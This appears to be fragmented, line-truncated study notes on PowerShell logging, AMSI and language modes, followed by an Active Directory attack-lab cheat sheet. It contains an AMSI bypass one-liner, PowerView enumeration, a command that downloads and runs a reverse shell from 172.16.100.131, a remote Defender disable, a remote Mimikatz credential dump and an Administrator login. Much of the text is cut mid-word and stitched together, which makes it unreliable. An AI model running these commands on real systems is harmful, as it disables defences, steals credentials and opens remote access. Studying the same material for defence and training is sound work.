ell.exe, PowerShell ISE, custom hosts - .NET DLL, msbuild, installutil etc.) which uses PowerShell engine.
> Windows Components -> Windows PowerShell -> Turn on PowerShell transcription).
nts" directory.
scription is the Registry key. Set enable transcripting to 1.

ize because the command output is also recorded. It is always recommended to forward the transcripts to a log system to avoid the temp

stration Centre (ADAC) GUI Application.

ell engine regardless of host used.

> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging)

se 4104). Set "Log script block invocation start / stop events" for start and stop of scripts in Event ID 4105 & 4106 (increases the no. of log
ptBlockLogging is the Registry key. Set EnableScriptBlockLogging to 1.
based on a list of suspicious commands.
and deobfuscated code.

f suspicious commands.
n of script blocks is logged.
tivirus access to contents of a script before execution.
ethod (disk, encodedcommand, in-memory)
defender.
ndent on the signature based detection by the registered antivirus.

ent elements of a powershell session

nts are allowed, but allows only limited types. For eg: Add-Type,Win32APIs, COM objects are not allowed.
vice Guard User mode Code Integrity)

ent elements of a powershell session

nts are allowed, but allows only limited types. For eg: Add-Type,Win32APIs, COM objects are not allowed.
vice Guard User mode Code Integrity)
d language mode kicks-in by itself.

ntrol for PowerShell based remote delegated administration.

or doing specific tasks.
lem introduced with PowerShell
ed.

n the following categories :

rusted scripts)
hem

reference assemblies.
e PS v2.

tection)

y disabling it from the Group Policy Cache as discovered by Ryan Cobb

werShell. It is possible to read and modify the settings.
y disabling it from the Group Policy Cache as discovered by Ryan Cobb
werShell. It is possible to read and modify the settings.

ghts by setting the amsiInitFailed of System.Management.Automation.AmsiUtils

.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

ging and AMSI when done right.

ecomes GetFiel`d to bypass warning level auto logging.
s://github.com/danielbohannon) are very useful for implementing obfuscation.
indows PowerShell 5.1)

ripts, PowerShell 5 automatically uses the Constrained Language Mode.

meSpace to load PowerShell functionality.

h uses PowerShell engine.

cription).

to forward the transcripts to a log system to avoid the tempering and

Block Logging)

p of scripts in Event ID 4105 & 4106 (increases the no. of logs)

OM objects are not allowed.

OM objects are not allowed.

tils

n.
1 Use -FullData wherever possible while performing enumeration using PowerView
2 Enumerate ACLs for all the GPOs
3 Enumerate those GPOs where studentx or RDPUsers group have interesting permissions

4 Map all the trusts of the moneycorp.local forest

5 Map all the external trusts

6 Map trusts of trusting forests

7 Find the group of our foothold user and try to give that groupname as parameter to
Invoke-UserHunter
8 PowerShell Reverse shell listener

9 Turn off defender and AV protection and disable AMSI on Remote machine
10 Dump creds from LSA using mimikatz after loading it in memory of a remote machine
11 Login to a machine using a particular account
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} |
?{$_.IdentityReference -match "student"}
Get-NetForestDomain -Verbose | Get-NetDomainTrust
Get-NetForestDomain -Verbose | Get-NetDomainTrust |
?{$_.TrustType -eq 'External'}
Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-
NetDomainTrust

powershell iex (iwr http://172.16.100.131/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100

Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\Administrator